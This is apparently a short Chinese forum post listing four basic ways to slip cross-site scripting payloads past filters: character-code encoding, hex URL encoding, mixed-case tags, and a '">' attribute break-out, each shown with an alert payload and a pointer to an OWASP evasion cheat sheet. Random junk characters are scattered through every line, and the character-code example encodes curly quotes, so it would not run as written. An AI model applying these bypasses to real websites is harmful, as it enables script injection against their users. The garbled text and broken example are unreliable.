四种超级基础的绕过方法。; u& }! Q' v' L, b' T7 h7 _1 m
1.转换为ASCII码
% e3 y; w$ N6 `" E. o Q4 M! e% X8 F例子:原脚本为<script>alert(‘I love F4ck’)</script >+ B1 w% r R) }+ T, z$ v
通过转换,变成:3 L) J9 s0 _1 C0 V8 w! @6 \ _
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>9 \) \- H' J6 v3 _7 C
# M$ R! w7 t8 F: _$ b
2.转换为HEX(十六进制)" `1 [) u4 }$ s, J
例子:原脚本为<script>alert(‘I love F4ck’)</script>6 z4 c% r# O c j& h; ~
通过转换,变成:
$ z3 p+ M: s* J2 }5 X, [%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
7 S/ ? J% C, L z% K
6 z5 L2 y8 @! w8 y0 Q E3.转换脚本的大小写( V4 ?! o. T+ L! [
例子:原脚本为<script>alert(‘I love F4ck’)</script>
7 _' W$ W7 m1 h1 S9 D4 ^$ D转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
, y& e+ a3 [$ P
# ?4 L1 |9 S1 @& n, A2 x9 G4.增加闭合标记”>. T8 C: L/ G4 L5 }! v1 `- f
例子:原脚本为<script>alert(‘I love F4ck’)</script>
, _0 D J" S$ f转换为:”><script>alert(‘I love F4ck’)</script>/ x: w) D# G7 a1 Z
更详细绕过技术请参考此网页
( p8 E% W3 n" N2 Ghttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
8 L' M' T: j- |1 y! b* ? ( ]1 U. O" }& t7 f% g, t
转换工具使用的是火狐的 hackbar mozilla addon. |